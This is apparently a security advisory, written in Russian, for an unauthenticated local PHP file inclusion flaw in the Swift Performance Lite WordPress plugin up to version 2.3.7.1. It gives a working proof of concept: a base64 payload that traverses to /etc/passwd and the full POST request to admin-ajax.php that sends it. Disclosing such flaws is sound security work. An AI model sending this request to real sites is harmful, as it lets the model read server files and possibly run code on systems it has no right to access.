
Swift Performance Lite <= 2.3.7.1 - Неаутентифицированное локальное включение PHP-файлов через 'ajaxify'
Swift Performance Lite <= 2.3.7.1 - Неаутентифицированное локальное включение PHP-файлов через 'ajaxify'
Плагин Swift Performance Lite для WordPress уязвим к локальному включению PHP-файлов во всех версиях вплоть до 2.3.7.1 включительно через функцию 'ajaxify'. Это позволяет неаутентифицированным злоумышленникам включать и выполнять произвольные файлы на сервере, обеспечивая выполнение любого PHP-кода в этих файлах. Это может быть использовано для обхода контроля доступа, получения конфиденциальных данных или достижения выполнения кода в тех случаях, когда изображения и другие «безопасные» типы файлов могут быть загружены и включены.
Base64-полезная нагрузка = ["template-part","null","../../../../../etc/passwd"]
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==